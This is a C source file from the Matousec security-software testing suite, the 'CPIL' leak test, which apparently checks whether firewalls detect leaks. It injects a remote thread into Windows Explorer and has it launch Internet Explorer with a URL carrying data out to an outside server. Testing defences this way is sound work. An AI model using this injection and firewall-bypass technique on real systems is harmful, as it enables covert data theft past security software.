/*

 Security Software Testing Suite - CPIL (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Comodo Parent Injection Leak Test by Comodo Group, http://www.comodo.com/.


 Method description:

   * The technique is almost the same as the technique described in "awft4.c".
     The only exception is that Internet Explorer is used and it is started with a URL as a command line
     parameter rather than being infected with the infection code. This URL parameter,
     which also contains the data to transmit, redirects Internet Explorer to the Internet webpage.

*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include "include/ntinternals.h"
#include "include/common.h"
#include "include/funcdef_kernel32.h"
#include "include/funcdef_ws2_32.h"
#include "include/common-leak.h"
#include "include/common-univ.h"
#include "include/common-hook.h"


int main(int argc,char *argv[])
{
  COM_CONF conf;
  if (!com_console_init_main("CPIL","cpil",argc,argv,&conf,COM_TEST_TYPE_CPIL)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  DeleteUrlCacheEntry(conf.uri);

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  ULONG pid;
  int pres=com_get_pid_from_name(&pid,"explorer.exe",&err_inf);
  if (pres && (pid!=COM_CID_INVALID))
  {
    if (com_verbosity_get()) printf("The process of Windows Explorer found (PID = %ld).\n",pid);

    char imagepath[MAX_PATH];
    size_t imagepath_len;
    if (com_get_ie_path(imagepath,sizeof(imagepath),&err_inf))
    {
      if (com_verbosity_get()) printf("Internet Explorer's path set to \"%s\".\n",imagepath);
      imagepath_len=strlen(imagepath);

      char cmdline[MAX_PATH+COM_INET_URI_MAX_LEN];
      snprintf(cmdline,sizeof(cmdline),"\"%s\" \"%s\"",imagepath,conf.uri);
      cmdline[sizeof(cmdline)-1]='\0';
      size_t cmdline_len=strlen(cmdline);
      if (com_verbosity_get()) printf("Command line for the new Internet Explorer's process set to \"%s\".\n",cmdline);

      DWORD access=PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | SYNCHRONIZE;

      PCOM_UNIV_JOB jobs[2];
      if (com_univ_job_init(10,sizeof(access)+sizeof(pid)+3*sizeof(HANDLE),4,&jobs[0],&err_inf))
      {
        com_univ_job_stack_init_push(jobs[0],&access,sizeof(access));
        com_univ_job_stack_init_push(jobs[0],&pid,sizeof(pid));

        com_univ_job_action_set(jobs[0],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_server_init);
        com_univ_job_action_set(jobs[0],1,0,com_univ_handle_obtain_open_process);

        com_univ_job_action_set_arg(jobs[0],2,1,com_univ_job_stack_push_copy,-1);       // copy process handle
        com_univ_job_action_set_arg(jobs[0],3,2,com_univ_job_stack_push_copy,-1);       // copy process handle
        com_univ_job_action_set(jobs[0],4,3,com_univ_structure_alloc_write);
        com_univ_job_action_set(jobs[0],5,4,com_univ_structure_start_create_remote_thread);

        com_univ_job_action_set_arg(jobs[0],6,5,com_univ_job_stack_push_copy,-1);       // copy thread handle
        com_univ_job_action_set(jobs[0],7,6,com_univ_wait_mapping_event_handle);
        com_univ_job_action_set(jobs[0],8,5,com_univ_handle_close);                     // close thread handle
        com_univ_job_action_set(jobs[0],9,1,com_univ_handle_close);                     // close process handle


        DWORD flags=0;
        if (com_univ_job_init(6,sizeof(flags)+cmdline_len+1+2*sizeof(HANDLE),8,&jobs[1],&err_inf))
        {
          com_univ_job_stack_init_push(jobs[1],&flags,sizeof(flags));
          com_univ_job_stack_init_push(jobs[1],cmdline,cmdline_len+1);

          com_univ_job_action_set(jobs[1],0,COM_UNIV_JOB_ACTION_EXECUTE_ALWAYS,com_univ_client_init);
          com_univ_job_action_set(jobs[1],1,0,com_univ_handle_obtain_create_process);

          com_univ_job_action_set(jobs[1],2,1,com_univ_handle_close);                   // close process handle
          com_univ_job_action_set(jobs[1],3,1,com_univ_handle_close);                   // close thread handle
          com_univ_job_action_set(jobs[1],4,0,com_univ_client_send_result);
          com_univ_job_action_set(jobs[1],5,0,com_univ_client_finit);

          PCOM_UNIV univ=NULL;
          if (com_univ_init(0,"CPIL",2,jobs,&univ,&err_inf))
          {
            int index=com_univ_main(univ);

            if (!univ->error.occurred)
            {
              memcpy(&univ->error,&univ->server_mapping.data->error,sizeof(univ->error));

              if (!univ->error.occurred)
                res=TRUE;
            }

            if (univ->error.occurred)
            {
              if (univ->error.job_index==1) err_prefix="\nHELPER PROCESS (Windows Explorer) ERROR: ";
              com_univ_server_err_report(univ,&err_inf);
            }

            if (index>=0) com_univ_server_finit(univ,NULL);

            com_univ_finit(univ);
          }

          com_univ_job_finit(jobs[1]);
        }

        com_univ_job_finit(jobs[0]);
      }
    }
  } else if (pres) com_err_set_nc(&err_inf,"Unable to find Windows Explorer process \"explorer.exe\".\n");


  if (res)
  {
    char buffer[4096];
    res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
     && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);
  }

  return com_end_pref(res,&err_inf,&conf,err_prefix);
}
